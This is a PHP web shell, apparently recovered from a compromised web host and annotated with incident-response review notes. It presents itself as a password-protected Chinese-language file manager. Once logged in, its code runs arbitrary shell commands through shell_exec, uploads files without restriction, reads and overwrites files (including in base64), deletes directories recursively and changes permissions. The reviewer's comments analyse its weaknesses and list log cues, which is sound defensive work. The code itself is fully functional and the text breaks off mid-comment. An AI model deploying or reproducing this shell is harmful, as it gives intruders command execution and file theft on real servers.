File: /var/www/vhost/disk-apps/pma.bikenow.co/louis/infancy/KAvEDCSO.php
<?php
/*
 * "Secure initialisation" routine (name as given by the author).
 *
 * Review note: nothing in this function protects the host. It trims identifying
 * response headers, disables caching, turns off on-page PHP error display and
 * stores a random token in the session. All calls are prefixed with @, so any
 * failure is silent.
 */
function secure_init() {
    // Remove headers that identify the runtime. Whether 'Server' can be removed
    // from here depends on how the web server sets it — unconfirmed.
    if (function_exists('header_remove')) {
        @header_remove('X-Powered-By');
        @header_remove('Server');
    }
    @header('Content-Type: text/html; charset=UTF-8');
    // Ask browsers and proxies not to keep a copy of any response.
    @header('Cache-Control: no-store, no-cache, must-revalidate');
    if (function_exists('ini_set')) {
        // Errors are hidden from the page rather than handled.
        @ini_set('display_errors', '0');
        // NOTE(review): at the call site in this file session_start() runs before
        // secure_init(), so this cookie setting is presumably applied too late to
        // affect the already-started session — confirm against the PHP version in use.
        @ini_set('session.cookie_httponly', '1');
    }
    // A new token is generated on every request. It is not read anywhere else in
    // the visible source, so it does not act as a CSRF check. uniqid()/mt_rand()
    // are not cryptographically secure generators.
    $_SESSION['secure_token'] = hash('sha256', uniqid(mt_rand(), true));
}
// Entry point: start the session, then handle login and logout.
// Review note: access control is one shared password checked inside this script.
// No attempt limiting, lockout, audit logging or session-ID regeneration is
// visible in this file.
session_start();
secure_init();
// Hard-coded shared secret; the literal reads like an unedited template placeholder.
$auth_password = 'your_secure_password';
$login_page = false;
if (isset($_POST['password'])) {
    // Both values are SHA-256 hashed and the digests compared with ===.
    if (hash('sha256', $_POST['password']) === hash('sha256', $auth_password)) {
        $_SESSION['authenticated'] = true;
        // Redirect carrying a throw-away random value (8 random bytes = 16 hex chars).
        // Log-review cue: a POST to this script followed by GET ?access=<16 hex>.
        header("Location: ?access=".bin2hex(random_bytes(8)));
        exit;
    } else {
        // Makes the template render the "authentication failed" alert.
        $login_page = true;
    }
}
// Logout needs no authentication; it clears only the caller's own session.
if (isset($_GET['logout'])) {
    session_unset();
    session_destroy();
    // Same random-suffix redirect pattern as the login branch.
    header("Location: ?logout=".bin2hex(random_bytes(8)));
    exit;
}
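/**
 * Resolve a request-supplied path and confine it to a fixed set of root directories.
 *
 * The input is URL-decoded, canonicalised with realpath() (which resolves "..",
 * "." and symbolic links) and accepted only when the result is one of the
 * allowed roots or lies beneath one. In every other case the current working
 * directory is returned.
 *
 * Review notes:
 *  - The containment test compares against "root + '/'" so that a sibling such
 *    as "/tmp_other" or "/var/www-backup" is no longer accepted merely because
 *    its name starts with an allowed root.
 *  - The fallback value is a real directory, so callers cannot tell "rejected"
 *    from "the working directory was requested". Destructive callers should
 *    treat that ambiguity as a hazard.
 *  - The allowed roots are broad (/home, /tmp, /var/www); this limits very
 *    little on a typical web host.
 *
 * @param mixed $input Path taken from the request.
 * @return string|false Canonical allowed path, or getcwd() when the input is
 *                      not a string, does not resolve, or is outside the roots.
 */
function get_safe_path($input) {
    // Array-valued parameters (e.g. path[]=x) would make urldecode() fail.
    if (!is_string($input)) {
        return getcwd();
    }

    $allowed_roots = [
        realpath('/home'),
        realpath('/var/www/html'),
        realpath('/tmp'),
        realpath('/var/www')
    ];

    // NOTE(review): $_GET/$_POST values are already URL-decoded by PHP, so this is
    // a second decode. It is kept so existing links keep resolving the same way,
    // but names containing a literal '%' or '+' will not round-trip.
    $decoded_path = urldecode($input);

    $path = realpath($decoded_path);

    if ($path === false) {
        // NOTE(review): the request value is written to the log unescaped.
        error_log("路径解析失败: ".$decoded_path);
        return getcwd();
    }

    foreach ($allowed_roots as $root) {
        if ($root === false) {
            continue; // root does not exist on this host
        }
        // Compare on a directory boundary, not on a raw string prefix.
        $prefix = rtrim($root, '/').'/';
        if ($path === $root || strncmp($path, $prefix, strlen($prefix)) === 0) {
            return $path;
        }
    }

    error_log("路径不在允许范围内: ".$path);
    return getcwd();
}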
// Determine the directory for this request (always an absolute path): ?path= if
// present, otherwise the script's working directory.
// NOTE(review): this runs before any authentication check, so an unauthenticated
// request can already change the process working directory; the directory
// contents are only printed inside the authenticated part of the template.
$current_path = isset($_GET['path']) ? get_safe_path($_GET['path']) : getcwd();
chdir($current_path);
/**
 * Delete a file, or a directory together with everything below it.
 *
 * Review notes: there is no return value and every filesystem call is prefixed
 * with @, so a partial or failed deletion is indistinguishable from success.
 * is_dir() follows symbolic links, so a link pointing at a directory is
 * presumably descended into rather than removed as a link — confirm before
 * relying on this routine for anything but forensic understanding.
 *
 * @param string $target Path to remove; callers pass the result of get_safe_path().
 */
function delete_item($target) {
    if (is_dir($target)) {
        $files = @scandir($target);
        if ($files !== false) {
            foreach ($files as $file) {
                // Skip the self and parent entries to avoid endless recursion.
                if ($file != '.' && $file != '..') {
                    delete_item("$target/$file");
                }
            }
            // Only attempted when the listing succeeded; fails quietly if entries remain.
            @rmdir($target);
        }
    } else {
        @unlink($target);
    }
}
// ---------------------------------------------------------------------------
// Request handlers. Each one requires $_SESSION['authenticated'], performs its
// action, stores a notification in the session and redirects.
// Review notes for responders:
//  - None of the handlers checks $_SESSION['secure_token'], so there is no
//    CSRF protection on any state-changing request.
//  - The parameter names used below (delete, new_name, upload_file,
//    file_content, use_base64, command, change_permission, perm_path,
//    perm_mode) are the request fields to look for in web and WAF logs.
// ---------------------------------------------------------------------------

// Recursive delete, triggered by a plain GET request.
// NOTE(review): get_safe_path() returns the current working directory when the
// requested path is rejected or missing, so such a request ends up calling
// delete_item() on the working directory itself.
if (isset($_GET['delete'])) {
    if (!empty($_SESSION['authenticated'])) {
        $target = get_safe_path($_GET['delete']);
        delete_item($target);
        $_SESSION['notification'] = ['type'=>'success', 'message'=>'删除成功'];
        header("Location: ?path=".urlencode(dirname($target)));
        exit;
    }
}
// Create a file or directory in the current directory. basename() strips any
// directory part from the name; a new file receives a fixed PHP comment stub.
// Any new_type other than 'file' creates a directory.
if (isset($_POST['new_name']) && !empty($_SESSION['authenticated'])) {
    $name = basename($_POST['new_name']);
    $type = $_POST['new_type'];
    $new_path = "$current_path/$name";
    $success = false;
    
    if ($type === 'file') {
        $success = @file_put_contents($new_path, "<?php // Auto-generated file ?>") !== false;
    } else {
        $success = @mkdir($new_path);
    }
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'创建成功'] 
        : ['type'=>'error', 'message'=>'创建失败'];
    header("Location: ?path=".urlencode($current_path));
    exit;
}
// File upload. The client-supplied file name is kept (basename only); there is
// no restriction on extension, type or size, and the result is made
// world-readable (0644). Under a web root this allows placing further
// executable scripts.
if (isset($_FILES['upload_file']) && !empty($_SESSION['authenticated'])) {
    $upload_path = isset($_POST['upload_path']) ? get_safe_path($_POST['upload_path']) : $current_path;
    $target = "$upload_path/".basename($_FILES['upload_file']['name']);
    $success = false;
    
    if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
        @chmod($target, 0644);
        $success = true;
    }
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'上传成功'] 
        : ['type'=>'error', 'message'=>'上传失败'];
    header("Location: ?path=".urlencode($upload_path));
    exit;
}
// Overwrite an existing file with request-supplied content. When use_base64 is
// set the body arrives base64-encoded, so request-body inspection that looks
// for raw script markers will presumably not match — decode before matching.
// get_safe_path() relies on realpath(), so only paths that already exist resolve.
if (isset($_POST['file_content']) && !empty($_SESSION['authenticated'])) {
    $file_path = get_safe_path($_POST['file_path']);
    $content = isset($_POST['use_base64']) ? base64_decode($_POST['file_content']) : $_POST['file_content'];
    $success = @file_put_contents($file_path, $content) !== false;
    
    $_SESSION['notification'] = $success 
        ? ['type'=>'success', 'message'=>'保存成功'] 
        : ['type'=>'error', 'message'=>'保存失败'];
    header("Location: ?path=".urlencode(dirname($file_path)));
    exit;
}
// Operating-system command execution: the raw POST value is handed to
// shell_exec() with stderr merged into the output. This runs with the
// privileges of the PHP process and is not limited by get_safe_path(), which
// makes every path restriction elsewhere in the file moot. The output is kept
// in the session and shown once by the template.
// Mitigation pointers: treat the host as compromised if this file was
// reachable; listing shell_exec and related functions in disable_functions
// and denying script execution in writable directories reduce exposure.
if (isset($_POST['command']) && !empty($_SESSION['authenticated'])) {
    $command = $_POST['command'];
    $output = shell_exec($command." 2>&1");
    $_SESSION['command_output'] = $output;
    $_SESSION['notification'] = ['type'=>'success', 'message'=>'命令执行完成'];
    header("Location: ?path=".urlencode($current_path)."&cmd=executed");
    exit;
}
// Permission change. The mode must be 3 or 4 octal digits, so setuid, setgid
// and sticky bits can be set as well as the usual rwx bits.
if (isset($_POST['change_permission']) && !empty($_SESSION['authenticated'])) {
    $target_path = get_safe_path($_POST['perm_path']);
    $mode = $_POST['perm_mode'];
    
    if (preg_match('/^[0-7]{3,4}$/', $mode)) {
        if (@chmod($target_path, octdec($mode))) {
            $_SESSION['notification'] = ['type' => 'success', 'message' => '权限修改成功'];
        } else {
            $_SESSION['notification'] = ['type' => 'error', 'message' => '权限修改失败'];
        }
    } else {
        $_SESSION['notification'] = ['type' => 'error', 'message' => '无效的权限模式'];
    }
    
    // Always a redirect, whatever the outcome of chmod().
    header("Location: ?path=".urlencode(dirname($target_path)));
    exit;
}
/**
 * List the entries of a directory, tolerating unreadable or missing paths.
 *
 * @param string $path Directory to list.
 * @return array Entry names as returned by scandir(), or just the self and
 *               parent entries when the directory cannot be read.
 */
function scan_directory($path) {
    $entries = @scandir($path);
    if ($entries === false) {
        // Fall back to a listing that the template renders as empty.
        return ['.', '..'];
    }
    return $entries;
}
// Listing of the current directory, read on every request (before the template
// decides whether the visitor is authenticated) and printed in the file table.
$directory_items = scan_directory($current_path);
/**
 * Describe a path's permission bits as "<octal> (<rwx string>)".
 *
 * The octal part is the last four digits of the mode, so setuid/setgid/sticky
 * bits show up there; the rwx string covers only the nine owner/group/other
 * bits.
 *
 * @param string $path Path to inspect.
 * @return string For example "0644 (rw-r--r--)".
 */
function get_permission_info($path) {
    $perms = fileperms($path);

    // Bit mask => letter, ordered owner, group, other.
    $bit_letters = [
        0x0100 => 'r', 0x0080 => 'w', 0x0040 => 'x',
        0x0020 => 'r', 0x0010 => 'w', 0x0008 => 'x',
        0x0004 => 'r', 0x0002 => 'w', 0x0001 => 'x',
    ];

    $info = '';
    foreach ($bit_letters as $mask => $letter) {
        $info .= ($perms & $mask) ? $letter : '-';
    }

    $octal = substr(sprintf('%o', $perms), -4);
    return $octal.' ('.$info.')';
}
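/**
 * Format a byte count as a human-readable size using 1024-based units.
 *
 * Non-numeric, zero and negative inputs are all reported as "0 Bytes". This
 * matters because filesize() returns false on failure, for example for a
 * dangling symbolic link, and the logarithm below is undefined for such values.
 * Values beyond the largest unit are expressed in that unit instead of indexing
 * past the end of the unit table.
 *
 * @param int|float|false|null $bytes Size in bytes.
 * @return string For example "1.5 KB".
 */
function format_size($bytes) {
    if (!is_numeric($bytes) || $bytes <= 0) return '0 Bytes';
    $k = 1024;
    $sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB'];
    // Unit index, clamped to the table so sub-byte or very large values stay valid.
    $i = (int) floor(log($bytes) / log($k));
    $i = max(0, min($i, count($sizes) - 1));
    return round($bytes / pow($k, $i), 2).' '.$sizes[$i];
}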
/**
 * Build the query string that navigates to a sub-directory.
 *
 * (Original author's remark: this is the "fixed" version of the directory
 * link generator.)
 *
 * @param string $base_path Directory currently shown; trailing slashes are dropped.
 * @param string $dir_name  Name of the child directory, may be empty.
 * @return string "?path=" followed by the URL-encoded "<base>/<name>/".
 */
function generate_directory_link($base_path, $dir_name) {
    $base = rtrim($base_path, '/');
    $target = "{$base}/{$dir_name}/";
    return '?path='.urlencode($target);
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>高级文件管理系统</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        :root {
            --primary: #4361ee;
            --secondary: #3f37c9;
            --success: #4cc9f0;
            --danger: #f72585;
            --warning: #f8961e;
            --info: #4895ef;
            --light: #f8f9fa;
            --dark: #212529;
            --gray: #6c757d;
            --white: #ffffff;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #f5f7fb;
            color: #333;
            line-height: 1.6;
        }
        
        .container {
            max-width: 1400px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .header {
            background-color: white;
            border-radius: 10px;
            padding: 20px;
            margin-bottom: 20px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.05);
        }
        
        .page-title {
            font-size: 1.8rem;
            font-weight: 700;
            color: var(--dark);
            margin-bottom: 10px;
        }
        
        .status-bar {
            display: flex;
            justify-content: space-between;
            font-size: 0.9rem;
            color: var(--gray);
        }
        
        .alert {
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
        }
        
        .alert i {
            margin-right: 10px;
            font-size: 1.2rem;
        }
        
        .alert-success {
            background-color: rgba(76, 201, 240, 0.1);
            border-left: 4px solid var(--success);
            color: #0a9396;
        }
        
        .alert-error {
            background-color: rgba(247, 37, 133, 0.1);
            border-left: 4px solid var(--danger);
            color: #ae0d4a;
        }
        
        .card {
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.05);
            margin-bottom: 25px;
            overflow: hidden;
        }
        
        .card-header {
            padding: 15px 20px;
            border-bottom: 1px solid rgba(0,0,0,0.05);
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .card-title {
            font-size: 1.2rem;
            font-weight: 600;
            color: var(--dark);
        }
        
        .card-body {
            padding: 20px;
        }
        
        .breadcrumb {
            display: flex;
            flex-wrap: wrap;
            padding: 10px 0;
            margin-bottom: 20px;
            list-style: none;
        }
        
        .breadcrumb-item {
            color: var(--gray);
        }
        
        .breadcrumb-item a {
            color: var(--primary);
            text-decoration: none;
            transition: all 0.3s ease;
        }
        
        .breadcrumb-item a:hover {
            color: var(--secondary);
            text-decoration: underline;
        }
        
        .breadcrumb-separator {
            margin: 0 10px;
            color: var(--gray);
        }
        
        .file-table {
            width: 100%;
            border-collapse: collapse;
            font-size: 0.95rem;
        }
        
        .file-table th {
            background-color: #f8f9fa;
            padding: 12px 15px;
            text-align: left;
            font-weight: 600;
            color: var(--dark);
            border-bottom: 2px solid #dee2e6;
        }
        
        .file-table td {
            padding: 12px 15px;
            border-bottom: 1px solid #e9ecef;
            vertical-align: middle;
        }
        
        .file-table tr:last-child td {
            border-bottom: none;
        }
        
        .file-table tr:hover td {
            background-color: rgba(67, 97, 238, 0.05);
        }
        
        .file-icon {
            width: 24px;
            height: 24px;
            margin-right: 10px;
            color: var(--primary);
        }
        
        .file-name {
            display: flex;
            align-items: center;
        }
        
        .file-actions {
            display: flex;
            gap: 8px;
        }
        
        .action-btn {
            padding: 6px 12px;
            border-radius: 5px;
            font-size: 0.85rem;
            cursor: pointer;
            transition: all 0.3s ease;
            text-decoration: none;
            display: inline-flex;
            align-items: center;
            border: 1px solid transparent;
        }
        
        .action-btn i {
            margin-right: 5px;
        }
        
        .edit-btn {
            background-color: rgba(67, 97, 238, 0.1);
            color: var(--primary);
            border-color: rgba(67, 97, 238, 0.2);
        }
        
        .edit-btn:hover {
            background-color: rgba(67, 97, 238, 0.2);
        }
        
        .delete-btn {
            background-color: rgba(247, 37, 133, 0.1);
            color: var(--danger);
            border-color: rgba(247, 37, 133, 0.2);
        }
        
        .delete-btn:hover {
            background-color: rgba(247, 37, 133, 0.2);
        }
        
        .perm-btn {
            background-color: rgba(72, 149, 239, 0.1);
            color: var(--info);
            border-color: rgba(72, 149, 239, 0.2);
        }
        
        .perm-btn:hover {
            background-color: rgba(72, 149, 239, 0.2);
        }
        
        .cmd-btn {
            background-color: rgba(248, 150, 30, 0.1);
            color: var(--warning);
            border-color: rgba(248, 150, 30, 0.2);
        }
        
        .cmd-btn:hover {
            background-color: rgba(248, 150, 30, 0.2);
        }
        
        .form-group {
            margin-bottom: 15px;
        }
        
        .form-label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
            color: var(--dark);
        }
        
        .form-control {
            width: 100%;
            padding: 10px 15px;
            border: 1px solid #ced4da;
            border-radius: 5px;
            font-size: 1rem;
            transition: all 0.3s ease;
            font-family: 'Consolas', monospace;
        }
        
        .form-control:focus {
            border-color: var(--primary);
            box-shadow: 0 0 0 0.2rem rgba(67, 97, 238, 0.25);
            outline: none;
        }
        
        .btn {
            padding: 10px 20px;
            border-radius: 5px;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            border: none;
            display: inline-flex;
            align-items: center;
            justify-content: center;
        }
        
        .btn i {
            margin-right: 8px;
        }
        
        .btn-primary {
            background-color: var(--primary);
            color: white;
        }
        
        .btn-primary:hover {
            background-color: #3a56d4;
        }
        
        .btn-danger {
            background-color: var(--danger);
            color: white;
        }
        
        .btn-danger:hover {
            background-color: #d1145a;
        }
        
        .btn-block {
            display: block;
            width: 100%;
        }
        
        .terminal {
            background-color: #1e1e1e;
            color: #f0f0f0;
            border-radius: 5px;
            padding: 15px;
            font-family: 'Consolas', monospace;
            font-size: 0.9rem;
            line-height: 1.5;
            overflow-x: auto;
            margin-bottom: 20px;
            max-height: 300px;
        }
        
        .terminal pre {
            margin: 0;
            white-space: pre-wrap;
            word-break: break-all;
        }
        
        .modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0,0,0,0.5);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 1000;
            opacity: 0;
            visibility: hidden;
            transition: all 0.3s ease;
        }
        
        .modal.show {
            opacity: 1;
            visibility: visible;
        }
        
        .modal-content {
            background-color: white;
            border-radius: 10px;
            width: 100%;
            max-width: 500px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.1);
            transform: translateY(-20px);
            transition: all 0.3s ease;
        }
        
        .modal.show .modal-content {
            transform: translateY(0);
        }
        
        .modal-header {
            padding: 15px 20px;
            border-bottom: 1px solid #dee2e6;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .modal-title {
            font-size: 1.3rem;
            font-weight: 600;
            margin: 0;
        }
        
        .modal-close {
            background: none;
            border: none;
            font-size: 1.5rem;
            cursor: pointer;
            color: var(--gray);
        }
        
        .modal-body {
            padding: 20px;
        }
        
        .modal-footer {
            padding: 15px 20px;
            border-top: 1px solid #dee2e6;
            display: flex;
            justify-content: flex-end;
            gap: 10px;
        }
        
        .tabs {
            display: flex;
            border-bottom: 1px solid #dee2e6;
            margin-bottom: 20px;
        }
        
        .tab {
            padding: 10px 20px;
            cursor: pointer;
            font-weight: 500;
            color: var(--gray);
            border-bottom: 2px solid transparent;
            transition: all 0.3s ease;
        }
        
        .tab.active {
            color: var(--primary);
            border-bottom-color: var(--primary);
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
        }
        
        .directory-link {
            color: var(--primary);
            text-decoration: none;
            transition: all 0.3s ease;
        }
        
        .directory-link:hover {
            text-decoration: underline;
            color: var(--secondary);
        }
        
        .path-display {
            font-family: 'Courier New', monospace;
            background-color: #f8f9fa;
            padding: 5px 10px;
            border-radius: 4px;
            font-size: 0.9rem;
        }
        
        @media (max-width: 768px) {
            .container {
                padding: 15px;
            }
            
            .file-actions {
                flex-direction: column;
                gap: 5px;
            }
            
            .action-btn {
                width: 100%;
                justify-content: center;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <?php if (empty($_SESSION['authenticated'])): ?>
    <div class="card" style="max-width: 500px; margin: 50px auto;">
        <div class="card-header">
            <h2 class="card-title"><i class="fas fa-lock"></i> 系统认证</h2>
        </div>
        <div class="card-body">
            <?php if ($login_page): ?>
            <div class="alert alert-error">
                <i class="fas fa-exclamation-circle"></i>
                <span>认证失败,请重试</span>
            </div>
            <?php endif; ?>
            <form method="post">
                <div class="form-group">
                    <label class="form-label" for="password">认证密码</label>
                    <input type="password" class="form-control" id="password" name="password" required>
                </div>
                <button type="submit" class="btn btn-primary btn-block">
                    <i class="fas fa-sign-in-alt"></i> 登入系统
                </button>
            </form>
        </div>
    </div>
    <?php else: ?>
    <div class="header">
        <div class="page-title">
            <i class="fas fa-folder-open"></i> 高级文件管理系统
        </div>
        <div class="status-bar">
            <span>当前路径: <strong><?= htmlspecialchars($current_path) ?></strong></span>
            <span>PHP版本: <?= phpversion() ?> | 用户: <?= htmlspecialchars(get_current_user()) ?></span>
        </div>
        
        <?php if (!empty($_SESSION['notification'])): 
            $msg = $_SESSION['notification'];
            $class = $msg['type'] === 'success' ? 'alert-success' : 'alert-error';
            $icon = $msg['type'] === 'success' ? 'fa-check-circle' : 'fa-exclamation-circle';
        ?>
        <div class="alert <?= $class ?>">
            <i class="fas <?= $icon ?>"></i>
            <span><?= htmlspecialchars($msg['message']) ?></span>
        </div>
        <?php unset($_SESSION['notification']); endif; ?>
    </div>
    
    <div class="breadcrumb">
        <div class="breadcrumb-item">
            <a href="?path=<?= urlencode(dirname($current_path)) ?>" class="directory-link">
                <i class="fas fa-home"></i> 根目录
            </a>
        </div>
        <?php 
        // Breadcrumb trail: one link per component of the current path.
        // $current accumulates the path walked so far ("a/", "a/b/", ...); the
        // leading "/" is added literally in the href. Component text is
        // HTML-escaped and the link target URL-encoded before output.
        $path_parts = explode('/', trim($current_path, '/'));
        $current = '';
        foreach ($path_parts as $i => $part) {
            $current .= $part . '/';
            // An empty component (current path is "/") produces no crumb.
            if ($part === '') continue;
            echo '<div class="breadcrumb-separator">/</div>';
            echo '<div class="breadcrumb-item"><a href="?path=/'.urlencode($current).'" class="directory-link">'.htmlspecialchars($part).'</a></div>';
        }
        ?>
    </div>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title"><i class="fas fa-cogs"></i> 快速操作</h2>
        </div>
        <div class="card-body">
            <div class="tabs">
                <div class="tab active" data-tab="create">新建</div>
                <div class="tab" data-tab="upload">上传</div>
                <div class="tab" data-tab="command">命令</div>
            </div>
            
            <div id="create" class="tab-content active">
                <form method="post">
                    <div class="form-group">
                        <label class="form-label" for="new_name">名称</label>
                        <input type="text" class="form-control" id="new_name" name="new_name" required>
                    </div>
                    <div class="form-group">
                        <label class="form-label" for="new_type">类型</label>
                        <select class="form-control" id="new_type" name="new_type" required>
                            <option value="file">文件</option>
                            <option value="folder">文件夹</option>
                        </select>
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-plus"></i> 创建
                    </button>
                </form>
            </div>
            
            <div id="upload" class="tab-content">
                <form method="post" enctype="multipart/form-data">
                    <div class="form-group">
                        <label class="form-label" for="upload_file">选择文件</label>
                        <input type="file" class="form-control" id="upload_file" name="upload_file" required>
                    </div>
                    <div class="form-group">
                        <label class="form-label" for="upload_path">上传路径 (可选)</label>
                        <input type="text" class="form-control" id="upload_path" name="upload_path" value="<?= htmlspecialchars($current_path) ?>">
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-upload"></i> 上传
                    </button>
                </form>
            </div>
            
            <div id="command" class="tab-content">
                <form method="post">
                    <div class="form-group">
                        <label class="form-label" for="command">系统命令</label>
                        <input type="text" class="form-control" id="command" name="command" placeholder="输入要执行的命令" required>
                    </div>
                    <button type="submit" class="btn btn-primary">
                        <i class="fas fa-terminal"></i> 执行
                    </button>
                </form>
                
                <?php if (isset($_SESSION['command_output'])): ?>
                <div class="terminal mt-3">
                    <pre><?= htmlspecialchars($_SESSION['command_output']) ?></pre>
                </div>
                <?php unset($_SESSION['command_output']); endif; ?>
            </div>
        </div>
    </div>
    
    <?php if (isset($_GET['edit'])): 
        // File viewer/editor, rendered only inside the authenticated branch of
        // the template. Any regular file under the roots accepted by
        // get_safe_path() is read in full and sent to the browser, so this is a
        // file-disclosure capability as well as an editor: when scoping an
        // incident, count every file readable by the PHP process under those
        // roots as potentially exposed. With ?b64 the content is sent
        // base64-encoded inside the page.
        $edit_file = get_safe_path($_GET['edit']);
        if (is_file($edit_file)):
            $file_content = file_get_contents($edit_file);
            $display_content = isset($_GET['b64']) ? base64_encode($file_content) : $file_content;
    ?>
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-edit"></i> 编辑文件: <?= htmlspecialchars(basename($edit_file)) ?>
            </h2>
        </div>
        <div class="card-body">
            <form method="post" id="editor-form">
                <input type="hidden" name="file_path" value="<?= htmlspecialchars($edit_file) ?>">
                <div class="form-group">
                    <textarea class="form-control" name="file_content" rows="15" style="font-family: 'Courier New', monospace;"><?= htmlspecialchars($display_content) ?></textarea>
                </div>
                <div class="form-group">
                    <label>
                        <input type="checkbox" name="use_base64" <?= isset($_GET['b64']) ? 'checked' : '' ?>>
                        使用Base64编码
                    </label>
                </div>
                <button type="submit" class="btn btn-primary">
                    <i class="fas fa-save"></i> 保存
                </button>
                <a href="?path=<?= urlencode(dirname($edit_file)) ?>" class="btn">
                    <i class="fas fa-times"></i> 取消
                </a>
            </form>
        </div>
    </div>
    <?php endif; endif; ?>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-list"></i> 文件列表
            </h2>
        </div>
        <div class="card-body">
            <table class="file-table">
                <thead>
                    <tr>
                        <th>名称</th>
                        <th>类型</th>
                        <th>权限</th>
                        <th>大小</th>
                        <th>修改时间</th>
                        <th>操作</th>
                    </tr>
                </thead>
                <tbody>
                    <?php if ($current_path !== '/'): ?>
                    <tr>
                        <td colspan="6">
                            <a href="<?= generate_directory_link(dirname($current_path), '') ?>" class="directory-link">
                                <i class="fas fa-level-up-alt"></i> 返回上级目录
                            </a>
                        </td>
                    </tr>
                    <?php endif; ?>
                    
                    <?php foreach ($directory_items as $item): 
                        // One table row per directory entry; "." and ".." are skipped.
                        // NOTE(review): entry names come from the file system, i.e. from
                        // whoever can create files in the directory. In the two onclick
                        // handlers further down (the delete confirm() and
                        // showPermissionModal()) the name is placed inside a JavaScript
                        // string within an HTML attribute and only passed through
                        // htmlspecialchars(). The browser decodes the attribute before the
                        // script runs, so HTML escaping alone does not neutralise quotes
                        // for the JavaScript context; the context-correct form is a
                        // json_encode()d value that is then HTML-escaped.
                        // NOTE(review): deletion is a plain GET link, so it can be
                        // triggered by any navigation made with an authenticated session.
                        // filesize()/filemtime() results are used without a failure check.
                        if ($item === '.' || $item === '..') continue;
                        $full_path = "$current_path/$item";
                        $is_dir = is_dir($full_path);
                        $file_size = $is_dir ? '-' : format_size(filesize($full_path));
                        $mod_time = date('Y-m-d H:i:s', filemtime($full_path));
                    ?>
                    <tr>
                        <td>
                            <div class="file-name">
                                <i class="fas <?= $is_dir ? 'fa-folder' : 'fa-file' ?> file-icon"></i>
                                <?php if ($is_dir): ?>
                                    <a href="<?= generate_directory_link($current_path, $item) ?>" class="directory-link">
                                        <?= htmlspecialchars($item) ?>
                                    </a>
                                <?php else: ?>
                                    <a href="?edit=<?= urlencode($full_path) ?>" class="directory-link">
                                        <?= htmlspecialchars($item) ?>
                                    </a>
                                <?php endif; ?>
                            </div>
                        </td>
                        <td><?= $is_dir ? '目录' : '文件' ?></td>
                        <td><?= get_permission_info($full_path) ?></td>
                        <td><?= $file_size ?></td>
                        <td><?= $mod_time ?></td>
                        <td>
                            <div class="file-actions">
                                <?php if (!$is_dir): ?>
                                <a href="?edit=<?= urlencode($full_path) ?>" class="action-btn edit-btn">
                                    <i class="fas fa-edit"></i> 编辑
                                </a>
                                <?php endif; ?>
                                <a href="?delete=<?= urlencode($full_path) ?>" class="action-btn delete-btn" onclick="return confirm('确定删除 <?= htmlspecialchars($item) ?>?')">
                                    <i class="fas fa-trash"></i> 删除
                                </a>
                                <a href="#" class="action-btn perm-btn" onclick="showPermissionModal('<?= htmlspecialchars($full_path) ?>')">
                                    <i class="fas fa-key"></i> 权限
                                </a>
                            </div>
                        </td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>
    </div>
    
    <div class="card">
        <div class="card-header">
            <h2 class="card-title">
                <i class="fas fa-sign-out-alt"></i> 会话管理
            </h2>
        </div>
        <div class="card-body">
            <a href="?logout=1" class="btn btn-danger">
                <i class="fas fa-sign-out-alt"></i> 退出系统
            </a>
        </div>
    </div>
    <?php endif; ?>
</div>
<!-- 权限修改模态框 -->
<div id="permission-modal" class="modal">
    <div class="modal-content">
        <div class="modal-header">
            <h3 class="modal-title"><i class="fas fa-key"></i> 修改权限</h3>
            <button class="modal-close" onclick="closeModal()">×</button>
        </div>
        <div class="modal-body">
            <form id="permission-form">
                <input type="hidden" id="perm-path" name="perm_path">
                <div class="form-group">
                    <label class="form-label" for="perm-mode">权限模式 (例如: 755)</label>
                    <input type="text" class="form-control" id="perm-mode" name="perm_mode" pattern="[0-7]{3,4}" required>
                </div>
            </form>
        </div>
        <div class="modal-footer">
            <button class="btn btn-secondary" onclick="closeModal()">取消</button>
            <button class="btn btn-primary" onclick="submitPermissionForm()">确认</button>
        </div>
    </div>
</div>
<script>
    // Tab switcher for the "quick actions" card: clicking a tab clears the
    // 'active' class everywhere, then marks the clicked tab and the panel whose
    // id equals the tab's data-tab attribute.
    document.querySelectorAll('.tab').forEach(tab => {
        tab.addEventListener('click', function() {
            document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
            document.querySelectorAll('.tab-content').forEach(c => c.classList.remove('active'));
            
            this.classList.add('active');
            const tabId = this.getAttribute('data-tab');
            document.getElementById(tabId).classList.add('active');
        });
    });
    
    /**
     * Open the permission dialog for a path and try to pre-fill the current mode.
     *
     * NOTE(review): the request goes to ?get_perm=<path>, but no handler for
